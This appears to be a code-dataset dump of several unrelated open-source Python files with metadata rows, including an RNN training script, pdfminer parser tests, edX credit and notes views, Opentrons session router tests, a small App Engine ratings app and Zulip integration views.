reader = csv.reader(f, skipinitialspace=True)
reader.next()
# Split full comments into sentences
sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])
# Append SENTENCE_START and SENTENCE_END
sentences = ["%s %s %s" % (sentence_start_token, x, sentence_end_token) for x in sentences]
print "Parsed %d sentences." % (len(sentences))
# Tokenize the sentences into words
tokenized_sentences = [nltk.word_tokenize(sent) for sent in sentences]
# Count the word frequencies
word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))
print "Found %d unique words tokens." % len(word_freq.items())
# Get the most common words and build index_to_word and word_to_index vectors
vocab = word_freq.most_common(vocabulary_size-1)
index_to_word = [x[0] for x in vocab]
index_to_word.append(unknown_token)
word_to_index = dict([(w,i) for i,w in enumerate(index_to_word)])
print "Using vocabulary size %d." % vocabulary_size
print "The least frequent word in our vocabulary is '%s' and appeared %d times." % (vocab[-1][0], vocab[-1][1])
# Replace all words not in our vocabulary with the unknown token
for i, sent in enumerate(tokenized_sentences):
tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sent]
# Create the training data
X_train = np.asarray([[word_to_index[w] for w in sent[:-1]] for sent in tokenized_sentences])
y_train = np.asarray([[word_to_index[w] for w in sent[1:]] for sent in tokenized_sentences])
model = RNNTheano(vocabulary_size, hidden_dim=_HIDDEN_DIM)
t1 = time.time()
model.sgd_step(X_train[10], y_train[10], _LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
if _MODEL_FILE != None:
load_model_parameters_theano(_MODEL_FILE, model)
train_with_sgd(model, X_train, y_train, nepoch=_NEPOCH, learning_rate=_LEARNING_RATE)
| unlicense | 4,335,853,474,409,367,600 | 40.505263 | 124 | 0.673852 | false |
pdfminer/pdfminer.six | tests/test_pdfminer_psparser.py | 2 | 3053 | import logging
from nose.tools import assert_equal
from pdfminer.psparser import KWD, LIT, PSBaseParser, PSStackParser, PSEOF
logger = logging.getLogger(__name__)
class TestPSBaseParser:
"""Simplistic Test cases"""
TESTDATA = br'''%!PS
begin end
" @ #
/a/BCD /Some_Name /foo#5f#xbaa
0 +1 -2 .5 1.234
(abc) () (abc ( def ) ghi)
(def\040\0\0404ghi) (bach\\slask) (foo\nbaa)
(this % is not a comment.)
(foo
baa)
(foo\
baa)
<> <20> < 40 4020 >
<abcd00
12345>
func/a/b{(c)do*}def
[ 1 (z) ! ]
<< /foo (bar) >>
'''
TOKENS = [
(5, KWD(b'begin')), (11, KWD(b'end')), (16, KWD(b'"')),
(19, KWD(b'@')), (21, KWD(b'#')), (23, LIT('a')), (25, LIT('BCD')),
(30, LIT('Some_Name')), (41, LIT('foo_xbaa')), (54, 0), (56, 1),
(59, -2), (62, 0.5), (65, 1.234), (71, b'abc'), (77, b''),
(80, b'abc ( def ) ghi'), (98, b'def \x00 4ghi'),
(118, b'bach\\slask'), (132, b'foo\nbaa'),
(143, b'this % is not a comment.'), (170, b'foo\nbaa'),
(180, b'foobaa'), (191, b''), (194, b' '), (199, b'@@ '),
(211, b'\xab\xcd\x00\x124\x05'), (226, KWD(b'func')), (230, LIT('a')),
(232, LIT('b')), (234, KWD(b'{')), (235, b'c'), (238, KWD(b'do*')),
(241, KWD(b'}')), (242, KWD(b'def')), (246, KWD(b'[')), (248, 1),
(250, b'z'), (254, KWD(b'!')), (256, KWD(b']')), (258, KWD(b'<<')),
(261, LIT('foo')), (266, b'bar'), (272, KWD(b'>>'))
]
OBJS = [
(23, LIT('a')), (25, LIT('BCD')), (30, LIT('Some_Name')),
(41, LIT('foo_xbaa')), (54, 0), (56, 1), (59, -2), (62, 0.5),
(65, 1.234), (71, b'abc'), (77, b''), (80, b'abc ( def ) ghi'),
(98, b'def \x00 4ghi'), (118, b'bach\\slask'), (132, b'foo\nbaa'),
(143, b'this % is not a comment.'), (170, b'foo\nbaa'),
(180, b'foobaa'), (191, b''), (194, b' '), (199, b'@@ '),
(211, b'\xab\xcd\x00\x124\x05'), (230, LIT('a')), (232, LIT('b')),
(234, [b'c']), (246, [1, b'z']), (258, {'foo': b'bar'}),
]
def get_tokens(self, s):
from io import BytesIO
class MyParser(PSBaseParser):
def flush(self):
self.add_results(*self.popall())
parser = MyParser(BytesIO(s))
r = []
try:
while True:
r.append(parser.nexttoken())
except PSEOF:
pass
return r
def get_objects(self, s):
from io import BytesIO
class MyParser(PSStackParser):
def flush(self):
self.add_results(*self.popall())
parser = MyParser(BytesIO(s))
r = []
try:
while True:
r.append(parser.nextobject())
except PSEOF:
pass
return r
def test_1(self):
tokens = self.get_tokens(self.TESTDATA)
logger.info(tokens)
assert_equal(tokens, self.TOKENS)
return
def test_2(self):
objs = self.get_objects(self.TESTDATA)
logger.info(objs)
assert_equal(objs, self.OBJS)
return
| mit | 7,970,602,359,698,973,000 | 28.931373 | 79 | 0.47396 | false |
edx/edx-platform | openedx/core/djangoapps/credit/services.py | 3 | 7489 | """
Implementation of "credit" XBlock service
"""
import logging
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
log = logging.getLogger(__name__)
def _get_course_key(course_key_or_id):
"""
Helper method to get a course key eith from a string or a CourseKey,
where the CourseKey will simply be returned
"""
return (
CourseKey.from_string(course_key_or_id)
if isinstance(course_key_or_id, str)
else course_key_or_id
)
class CreditService:
"""
Course Credit XBlock service
"""
def is_credit_course(self, course_key_or_id):
"""
Returns boolean if the passed in course_id (string) or course_key is
a credit_course
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
)
course_key = _get_course_key(course_key_or_id)
return is_credit_course(course_key)
def get_credit_state(self, user_id, course_key_or_id, return_course_info=False):
"""
Return all information about the user's credit state inside of a given
course.
ARGS:
- user_id: The PK of the User in question
- course_key: The course ID (as string or CourseKey)
RETURNS:
NONE (user not found or is not enrolled or is not credit course)
- or -
{
'enrollment_mode': the mode that the user is enrolled in the course
'profile_fullname': the name that the student registered under, used for verification
'is_credit_course': if the course has been marked as a credit bearing course
'credit_requirement_status': the user's status in fulfilling those requirements
'course_name': optional display name of the course
'course_end_date': optional end date of the course
}
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
get_credit_requirement_status,
)
# since we have to do name matching during various
# verifications, User must have a UserProfile
try:
user = User.objects.select_related('profile').get(id=user_id)
except ObjectDoesNotExist:
# bad user_id
return None
course_key = _get_course_key(course_key_or_id)
enrollment = CourseEnrollment.get_enrollment(user, course_key)
if not enrollment or not enrollment.is_active:
# not enrolled
return None
result = {
'enrollment_mode': enrollment.mode,
'profile_fullname': user.profile.name,
'student_email': user.email,
'is_credit_course': is_credit_course(course_key),
'credit_requirement_status': get_credit_requirement_status(course_key, user.username)
}
if return_course_info:
course_overview = CourseOverview.get_from_id(course_key)
result.update({
'course_name': course_overview.display_name,
'course_end_date': course_overview.end,
})
return result
def set_credit_requirement_status(self, user_id, course_key_or_id, req_namespace,
req_name, status="satisfied", reason=None):
"""
A simple wrapper around the method of the same name in api.eligibility.py. The only difference is
that a user_id is passed in.
For more information, see documentation on this method name in api.eligibility.py
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
set_credit_requirement_status as api_set_credit_requirement_status
)
course_key = _get_course_key(course_key_or_id)
# quick exit, if course is not credit enabled
if not is_credit_course(course_key):
return
# always log any update activity to the credit requirements
# table. This will be to help debug any issues that might
# arise in production
log_msg = (
'set_credit_requirement_status was called with '
'user_id={user_id}, course_key_or_id={course_key_or_id} '
'req_namespace={req_namespace}, req_name={req_name}, '
'status={status}, reason={reason}'.format(
user_id=user_id,
course_key_or_id=course_key_or_id,
req_namespace=req_namespace,
req_name=req_name,
status=status,
reason=reason
)
)
log.info(log_msg)
# need to get user_name from the user object
try:
user = User.objects.get(id=user_id)
except ObjectDoesNotExist:
return None
api_set_credit_requirement_status(
user,
course_key,
req_namespace,
req_name,
status,
reason
)
def remove_credit_requirement_status(self, user_id, course_key_or_id, req_namespace, req_name):
"""
A simple wrapper around the method of the same name in
api.eligibility.py. The only difference is that a user_id
is passed in.
For more information, see documentation on this method name
in api.eligibility.py
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
remove_credit_requirement_status as api_remove_credit_requirement_status
)
course_key = _get_course_key(course_key_or_id)
# quick exit, if course is not credit enabled
if not is_credit_course(course_key):
return
# always log any deleted activity to the credit requirements
# table. This will be to help debug any issues that might
# arise in production
log_msg = (
'remove_credit_requirement_status was called with '
'user_id={user_id}, course_key_or_id={course_key_or_id} '
'req_namespace={req_namespace}, req_name={req_name}, '.format(
user_id=user_id,
course_key_or_id=course_key_or_id,
req_namespace=req_namespace,
req_name=req_name
)
)
log.info(log_msg)
# need to get user_name from the user object
try:
user = User.objects.get(id=user_id)
except ObjectDoesNotExist:
return None
api_remove_credit_requirement_status(
user.username,
course_key,
req_namespace,
req_name
)
| agpl-3.0 | 1,703,073,508,382,825,700 | 33.995327 | 105 | 0.59741 | false |
OpenTrons/opentrons-api | robot-server/tests/service/session/test_router.py | 2 | 14869 | import pytest
from unittest.mock import MagicMock, patch
from datetime import datetime
import typing
from pydantic.main import BaseModel
from robot_server.service.dependencies import get_session_manager
from robot_server.service.session.command_execution import CommandExecutor, \
Command
from robot_server.service.session.command_execution.command import \
CommandResult, CompletedCommand, CommandContent, CommandMeta, CommandStatus
from robot_server.service.session.errors import SessionCreationException, \
UnsupportedCommandException, CommandExecutionException
from robot_server.service.session.models.common import EmptyModel, JogPosition
from robot_server.service.session.models.command import CalibrationCommand
from robot_server.service.session.models.session import SessionType
from robot_server.service.session.session_types import NullSession, \
SessionMetaData
@pytest.fixture
def mock_session_meta():
return SessionMetaData(identifier="some_id",
created_at=datetime(2000, 1, 1, 0, 0, 0))
@pytest.fixture
def session_response(mock_session_meta):
return {
'attributes': {
'details': {
},
'sessionType': 'null',
'createdAt': mock_session_meta.created_at.isoformat(),
'createParams': None,
},
'type': 'Session',
'id': mock_session_meta.identifier
}
@pytest.fixture
def command_id():
return "123"
@pytest.fixture
def command_created_at():
return datetime(2000, 1, 1)
@pytest.fixture
def patch_create_command(command_id, command_created_at):
with patch("robot_server.service.session.router.create_command") as p:
p.side_effect = lambda c, n: Command(
content=CommandContent(c, n),
meta=CommandMeta(command_id, command_created_at))
yield p
@pytest.fixture
def mock_command_executor():
mock = MagicMock(spec=CommandExecutor)
async def func(command):
return CompletedCommand(content=command.content,
meta=command.meta,
result=CommandResult(
status=CommandStatus.executed,
started_at=datetime(2019, 1, 1),
completed_at=datetime(2020, 1, 1))
)
mock.execute.side_effect = func
return mock
@pytest.fixture
def mock_session(mock_session_meta, mock_command_executor):
session = NullSession(configuration=MagicMock(),
instance_meta=mock_session_meta)
session._command_executor = mock_command_executor
async def func(*args, **kwargs):
pass
session.clean_up = MagicMock(side_effect=func)
return session
@pytest.fixture
def patch_create_session(mock_session):
r = "robot_server.service.session.session_types.BaseSession.create"
with patch(r) as p:
async def mock_build(*args, **kwargs):
return mock_session
p.side_effect = mock_build
yield p
@pytest.fixture
@pytest.mark.asyncio
async def session_manager_with_session(loop, patch_create_session):
manager = get_session_manager()
session = await manager.add(SessionType.null, SessionMetaData())
yield manager
await manager.remove(session.meta.identifier)
def test_create_session_error(api_client,
patch_create_session):
async def raiser(*args, **kwargs):
raise SessionCreationException(
"Please attach pipettes before proceeding"
)
patch_create_session.side_effect = raiser
response = api_client.post("/sessions", json={
"data": {
"type": "Session",
"attributes": {
"sessionType": "null"
}
}
})
assert response.json() == {
'errors': [{
'detail': "Please attach pipettes before proceeding",
'status': '403',
'title': 'Action Forbidden'}
]}
assert response.status_code == 403
def test_create_session(api_client,
patch_create_session,
mock_session_meta,
session_response):
response = api_client.post("/sessions", json={
"data": {
"type": "Session",
"attributes": {
"sessionType": "null"
}
}
})
assert response.json() == {
'data': session_response,
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: E501
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
}
}
}
assert response.status_code == 201
# Clean up
get_session_manager()._sessions = {}
def test_delete_session_not_found(api_client):
response = api_client.delete("/sessions/check")
assert response.json() == {
'errors': [{
'detail': "Resource type 'session' with id 'check' was not found",
'links': {
'self': {'href': '/sessions'},
'sessionById': {'href': '/sessions/{sessionId}'}
},
'status': '404',
'title': 'Resource Not Found'
}]
}
assert response.status_code == 404
def test_delete_session(api_client,
session_manager_with_session,
mock_session,
mock_session_meta,
session_response):
response = api_client.delete(f"/sessions/{mock_session_meta.identifier}")
# mock_session.clean_up.assert_called_once()
assert response.json() == {
'data': session_response,
'links': {
'self': {
'href': '/sessions',
},
'sessionById': {
'href': '/sessions/{sessionId}'
},
}
}
assert response.status_code == 200
def test_get_session_not_found(api_client):
response = api_client.get("/sessions/1234")
assert response.json() == {
'errors': [{
'detail': "Resource type 'session' with id '1234' was not found",
'links': {
'self': {'href': '/sessions'},
'sessionById': {'href': '/sessions/{sessionId}'}
},
'status': '404',
'title': 'Resource Not Found'
}]
}
assert response.status_code == 404
def test_get_session(api_client,
mock_session_meta,
session_manager_with_session,
session_response):
response = api_client.get(f"/sessions/{mock_session_meta.identifier}")
assert response.json() == {
'data': session_response,
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: e5011
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
}
}
}
assert response.status_code == 200
def test_get_sessions_no_sessions(api_client):
response = api_client.get("/sessions")
assert response.json() == {
'data': [],
}
assert response.status_code == 200
def test_get_sessions(api_client,
session_manager_with_session,
session_response):
response = api_client.get("/sessions")
assert response.json() == {
'data': [session_response],
}
assert response.status_code == 200
def command(command_type: str, body: typing.Optional[BaseModel]):
"""Helper to create command"""
return {
"data": {
"type": "SessionCommand",
"attributes": {
"command": command_type,
"data": body.dict(exclude_unset=True) if body else {}
}
}
}
def test_execute_command_no_session(api_client, mock_session_meta):
"""Test that command is rejected if there's no session"""
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("jog",
JogPosition(vector=(1, 2, 3,))))
assert response.json() == {
'errors': [{
'detail': f"Resource type 'session' with id '{mock_session_meta.identifier}' was not found", # noqa: e5011
'links': {
'self': {'href': '/sessions'},
'sessionById': {'href': '/sessions/{sessionId}'}
},
'status': '404',
'title': 'Resource Not Found'
}]
}
assert response.status_code == 404
def test_execute_command(api_client,
session_manager_with_session,
mock_session_meta,
mock_command_executor,
command_id,
command_created_at,
patch_create_command):
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("calibration.jog",
JogPosition(vector=(1, 2, 3,))))
mock_command_executor.execute.assert_called_once_with(
Command(
content=CommandContent(
name=CalibrationCommand.jog,
data=JogPosition(vector=(1, 2, 3,))
),
meta=CommandMeta(identifier=command_id,
created_at=command_created_at)
)
)
assert response.json() == {
'data': {
'attributes': {
'command': 'calibration.jog',
'data': {'vector': [1.0, 2.0, 3.0]},
'status': 'executed',
'createdAt': '2000-01-01T00:00:00',
'startedAt': '2019-01-01T00:00:00',
'completedAt': '2020-01-01T00:00:00',
},
'type': 'SessionCommand',
'id': command_id,
},
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: e501
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
},
}
}
assert response.status_code == 200
def test_execute_command_no_body(api_client,
session_manager_with_session,
mock_session_meta,
patch_create_command,
command_id,
command_created_at,
mock_command_executor):
"""Test that a command with empty body can be accepted"""
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("calibration.loadLabware", None)
)
mock_command_executor.execute.assert_called_once_with(
Command(
content=CommandContent(
name=CalibrationCommand.load_labware,
data=EmptyModel()),
meta=CommandMeta(command_id, command_created_at)
)
)
assert response.json() == {
'data': {
'attributes': {
'command': 'calibration.loadLabware',
'data': {},
'status': 'executed',
'createdAt': '2000-01-01T00:00:00',
'startedAt': '2019-01-01T00:00:00',
'completedAt': '2020-01-01T00:00:00',
},
'type': 'SessionCommand',
'id': command_id
},
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: e501
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
},
}
}
assert response.status_code == 200
@pytest.mark.parametrize(argnames="exception,expected_status",
argvalues=[
[UnsupportedCommandException, 403],
[CommandExecutionException, 403],
])
def test_execute_command_error(api_client,
session_manager_with_session,
mock_session_meta,
mock_command_executor,
exception,
expected_status):
"""Test that we handle executor errors correctly"""
async def raiser(*args, **kwargs):
raise exception("Cannot do it")
mock_command_executor.execute.side_effect = raiser
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("jog",
JogPosition(vector=(1, 2, 3,)))
)
assert response.json() == {
'errors': [
{
'detail': 'Cannot do it',
'status': f'{expected_status}',
'title': 'Action Forbidden'
}
]
}
assert response.status_code == expected_status
def test_execute_command_session_inactive(
api_client,
session_manager_with_session,
mock_session_meta,
mock_command_executor):
"""Test that only the active session can execute commands"""
session_manager_with_session._active.active_id = None
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("jog",
JogPosition(vector=(1, 2, 3,)))
)
assert response.json() == {
'errors': [
{
'title': 'Action Forbidden',
'status': '403',
'detail': f"Session '{mock_session_meta.identifier}'"
f" is not active. Only the active session can "
f"execute commands"
}
]
}
assert response.status_code == 403
| apache-2.0 | -8,265,883,172,919,127,000 | 30.569002 | 119 | 0.521689 | false |
angelapper/edx-platform | lms/djangoapps/edxnotes/views.py | 5 | 6721 | """
Views related to EdxNotes.
"""
import json
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import Http404, HttpResponse
from django.views.decorators.http import require_GET
from opaque_keys.edx.keys import CourseKey
from courseware.courses import get_course_with_access
from courseware.model_data import FieldDataCache
from courseware.module_render import get_module_for_descriptor
from edxmako.shortcuts import render_to_response
from edxnotes.exceptions import EdxNotesParseError, EdxNotesServiceUnavailable
from edxnotes.helpers import (
DEFAULT_PAGE,
DEFAULT_PAGE_SIZE,
NoteJSONEncoder,
get_course_position,
get_edxnotes_id_token,
get_notes,
is_feature_enabled
)
from util.json_request import JsonResponse, JsonResponseBadRequest
log = logging.getLogger(__name__)
@login_required
def edxnotes(request, course_id):
"""
Displays the EdxNotes page.
Arguments:
request: HTTP request object
course_id: course id
Returns:
Rendered HTTP response.
"""
course_key = CourseKey.from_string(course_id)
course = get_course_with_access(request.user, "load", course_key)
if not is_feature_enabled(course):
raise Http404
notes_info = get_notes(request, course)
has_notes = (len(notes_info.get('results')) > 0)
context = {
"course": course,
"notes_endpoint": reverse("notes", kwargs={"course_id": course_id}),
"notes": notes_info,
"page_size": DEFAULT_PAGE_SIZE,
"debug": settings.DEBUG,
'position': None,
'disabled_tabs': settings.NOTES_DISABLED_TABS,
'has_notes': has_notes,
}
if not has_notes:
field_data_cache = FieldDataCache.cache_for_descriptor_descendents(
course.id, request.user, course, depth=2
)
course_module = get_module_for_descriptor(
request.user, request, course, field_data_cache, course_key, course=course
)
position = get_course_position(course_module)
if position:
context.update({
'position': position,
})
return render_to_response("edxnotes/edxnotes.html", context)
@require_GET
@login_required
def notes(request, course_id):
"""
Notes view to handle list and search requests.
Query parameters:
page: page number to get
page_size: number of items in the page
text: text string to search. If `text` param is missing then get all the
notes for the current user for this course else get only those notes
which contain the `text` value.
Arguments:
request: HTTP request object
course_id: course id
Returns:
Paginated response as JSON. A sample response is below.
{
"count": 101,
"num_pages": 11,
"current_page": 1,
"results": [
{
"chapter": {
"index": 4,
"display_name": "About Exams and Certificates",
"location": "i4x://org/course/category/name@revision",
"children": [
"i4x://org/course/category/name@revision"
]
},
"updated": "Dec 09, 2015 at 09:31 UTC",
"tags": ["shadow","oil"],
"quote": "foo bar baz",
"section": {
"display_name": "edX Exams",
"location": "i4x://org/course/category/name@revision",
"children": [
"i4x://org/course/category/name@revision",
"i4x://org/course/category/name@revision",
]
},
"created": "2015-12-09T09:31:17.338305Z",
"ranges": [
{
"start": "/div[1]/p[1]",
"end": "/div[1]/p[1]",
"startOffset": 0,
"endOffset": 6
}
],
"user": "50cf92f9a3d8489df95e583549b919df",
"text": "first angry height hungry structure",
"course_id": "edx/DemoX/Demo",
"id": "1231",
"unit": {
"url": "/courses/edx%2FDemoX%2FDemo/courseware/1414ffd5143b4b508f739b563ab468b7/workflow/1",
"display_name": "EdX Exams",
"location": "i4x://org/course/category/name@revision"
},
"usage_id": "i4x://org/course/category/name@revision"
} ],
"next": "http://0.0.0.0:8000/courses/edx%2FDemoX%2FDemo/edxnotes/notes/?page=2&page_size=10",
"start": 0,
"previous": null
}
"""
course_key = CourseKey.from_string(course_id)
course = get_course_with_access(request.user, 'load', course_key)
if not is_feature_enabled(course):
raise Http404
page = request.GET.get('page') or DEFAULT_PAGE
page_size = request.GET.get('page_size') or DEFAULT_PAGE_SIZE
text = request.GET.get('text')
try:
notes_info = get_notes(
request,
course,
page=page,
page_size=page_size,
text=text
)
except (EdxNotesParseError, EdxNotesServiceUnavailable) as err:
return JsonResponseBadRequest({"error": err.message}, status=500)
return HttpResponse(json.dumps(notes_info, cls=NoteJSONEncoder), content_type="application/json")
# pylint: disable=unused-argument
@login_required
def get_token(request, course_id):
"""
Get JWT ID-Token, in case you need new one.
"""
return HttpResponse(get_edxnotes_id_token(request.user), content_type='text/plain')
@login_required
def edxnotes_visibility(request, course_id):
"""
Handle ajax call from "Show notes" checkbox.
"""
course_key = CourseKey.from_string(course_id)
course = get_course_with_access(request.user, "load", course_key)
field_data_cache = FieldDataCache([course], course_key, request.user)
course_module = get_module_for_descriptor(
request.user, request, course, field_data_cache, course_key, course=course
)
if not is_feature_enabled(course):
raise Http404
try:
visibility = json.loads(request.body)["visibility"]
course_module.edxnotes_visibility = visibility
course_module.save()
return JsonResponse(status=200)
except (ValueError, KeyError):
log.warning(
"Could not decode request body as JSON and find a boolean visibility field: '%s'", request.body
)
return JsonResponseBadRequest()
| agpl-3.0 | -1,188,266,086,755,511,000 | 31.626214 | 108 | 0.596637 | false |
endlessm/chromium-browser | tools/grit/grit/pseudo_unittest.py | 5 | 1861 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for grit.pseudo'''
from __future__ import print_function
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import unittest
from grit import pseudo
from grit import tclib
class PseudoUnittest(unittest.TestCase):
def testVowelMapping(self):
self.failUnless(pseudo.MapVowels('abebibobuby') ==
u'\u00e5b\u00e9b\u00efb\u00f4b\u00fcb\u00fd')
self.failUnless(pseudo.MapVowels('ABEBIBOBUBY') ==
u'\u00c5B\u00c9B\u00cfB\u00d4B\u00dcB\u00dd')
def testPseudoString(self):
out = pseudo.PseudoString('hello')
self.failUnless(out == pseudo.MapVowels(u'hePelloPo', True))
def testConsecutiveVowels(self):
out = pseudo.PseudoString("beautiful weather, ain't it?")
self.failUnless(out == pseudo.MapVowels(
u"beauPeautiPifuPul weaPeathePer, aiPain't iPit?", 1))
def testCapitals(self):
out = pseudo.PseudoString("HOWDIE DOODIE, DR. JONES")
self.failUnless(out == pseudo.MapVowels(
u"HOPOWDIEPIE DOOPOODIEPIE, DR. JOPONEPES", 1))
def testPseudoMessage(self):
msg = tclib.Message(text='Hello USERNAME, how are you?',
placeholders=[
tclib.Placeholder('USERNAME', '%s', 'Joi')])
trans = pseudo.PseudoMessage(msg)
# TODO(joi) It would be nicer if 'you' -> 'youPou' instead of
# 'you' -> 'youPyou' and if we handled the silent e in 'are'
self.failUnless(trans.GetPresentableContent() ==
pseudo.MapVowels(
u'HePelloPo USERNAME, hoPow aParePe youPyou?', 1))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 1,148,394,896,949,791,000 | 32.836364 | 72 | 0.653412 | false |
msavoury/machine-learning | apps/rateawatch/rateawatch.py | 1 | 2526 | import os
import webapp2
import jinja2
import webapp2
import json
from google.appengine.ext import ndb
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class UserRating(ndb.Model):
username = ndb.StringProperty()
ratings = ndb.JsonProperty()
class MainPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('index.html')
template_value = { 'value': 8}
self.response.write(template.render(template_value))
class RatingPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('index.html')
template_value = { 'value': 8}
self.response.write('dammit')
def post(self):
self.response.headers['Content-Type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('index.html')
template_value = { 'value': 8}
json_data = json.loads(self.request.body)
json_data['stuff'] = "marcos"
self.response.write(json.dumps(json_data))
class APIPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'application/json'
id = 6473924464345088
user = ndb.Key(UserRating, id).get()
name = user.username
self.response.write(json.dumps(name))
def post(self):
self.response.headers['Content-Type'] = 'application/json'
#TODO:// Make this more secure
json_data = json.loads(self.request.body)
user_rating = UserRating()
user_rating.username = json_data['username']
user_rating.ratings = json_data['ratings']
user_key = user_rating.put()
self.response.write('{"user_key":"' + str(user_key.id()) +'"}')
class RatingsPage(webapp2.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'application/json'
all_ratings = UserRating.query().fetch()
result = {}
result['stuff'] = [x.ratings for x in all_ratings]
self.response.write(json.dumps(result))
def delete(self):
ndb.delete_multi(UserRating.query().fetch(keys_only=True))
application = webapp2.WSGIApplication([
('/', MainPage),
('/api/rating', RatingPage),
('/api/test', APIPage),
('/api/ratings', RatingsPage),
], debug=True)
| mit | 307,169,230,011,078,660 | 31.805195 | 71 | 0.641726 | false |
AZtheAsian/zulip | zerver/views/integrations.py | 4 | 5338 | from __future__ import absolute_import
from typing import Optional, Any, Dict
from collections import OrderedDict
from django.views.generic import TemplateView
from django.conf import settings
from django.http import HttpRequest, HttpResponse, HttpResponseNotFound
import os
import ujson
from zerver.lib import bugdown
from zerver.lib.integrations import INTEGRATIONS, HUBOT_LOZENGES
from zerver.lib.utils import get_subdomain
from zproject.jinja2 import render_to_response
def add_api_uri_context(context, request):
# type: (Dict[str, Any], HttpRequest) -> None
if settings.REALMS_HAVE_SUBDOMAINS:
subdomain = get_subdomain(request)
if subdomain:
display_subdomain = subdomain
html_settings_links = True
else:
display_subdomain = 'yourZulipDomain'
html_settings_links = False
external_api_path_subdomain = '%s.%s' % (display_subdomain,
settings.EXTERNAL_API_PATH)
else:
external_api_path_subdomain = settings.EXTERNAL_API_PATH
html_settings_links = True
external_api_uri_subdomain = '%s%s' % (settings.EXTERNAL_URI_SCHEME,
external_api_path_subdomain)
context['external_api_path_subdomain'] = external_api_path_subdomain
context['external_api_uri_subdomain'] = external_api_uri_subdomain
context["html_settings_links"] = html_settings_links
class ApiURLView(TemplateView):
def get_context_data(self, **kwargs):
# type: (Optional[Dict[str, Any]]) -> Dict[str, str]
context = super(ApiURLView, self).get_context_data(**kwargs)
add_api_uri_context(context, self.request)
return context
class APIView(ApiURLView):
template_name = 'zerver/api.html'
class HelpView(ApiURLView):
template_name = 'zerver/help/main.html'
path_template = os.path.join(settings.DEPLOY_ROOT, 'templates/zerver/help/%s.md')
def get_path(self, article):
# type: (**Any) -> str
if article == "":
article = "index"
return self.path_template % (article,)
def get_context_data(self, **kwargs):
# type: (**Any) -> Dict[str, str]
article = kwargs["article"]
context = super(HelpView, self).get_context_data()
path = self.get_path(article)
if os.path.exists(path):
context["article"] = path
else:
context["article"] = self.get_path("missing")
return context
def get(self, request, article=""):
# type: (HttpRequest, str) -> HttpResponse
path = self.get_path(article)
result = super(HelpView, self).get(self, article=article)
if not os.path.exists(path):
# Ensure a 404 response code if no such document
result.status_code = 404
return result
class IntegrationView(ApiURLView):
template_name = 'zerver/integrations.html'
def get_context_data(self, **kwargs):
# type: (Optional[Dict[str, Any]]) -> Dict[str, Any]
context = super(IntegrationView, self).get_context_data(**kwargs) # type: Dict[str, Any]
alphabetical_sorted_integration = OrderedDict(sorted(INTEGRATIONS.items()))
alphabetical_sorted_hubot_lozenges = OrderedDict(sorted(HUBOT_LOZENGES.items()))
context['integrations_dict'] = alphabetical_sorted_integration
context['hubot_lozenges_dict'] = alphabetical_sorted_hubot_lozenges
if context["html_settings_links"]:
settings_html = '<a href="../#settings">Zulip settings page</a>'
subscriptions_html = '<a target="_blank" href="../#subscriptions">subscriptions page</a>'
else:
settings_html = 'Zulip settings page'
subscriptions_html = 'subscriptions page'
context['settings_html'] = settings_html
context['subscriptions_html'] = subscriptions_html
return context
def api_endpoint_docs(request):
# type: (HttpRequest) -> HttpResponse
context = {} # type: Dict[str, Any]
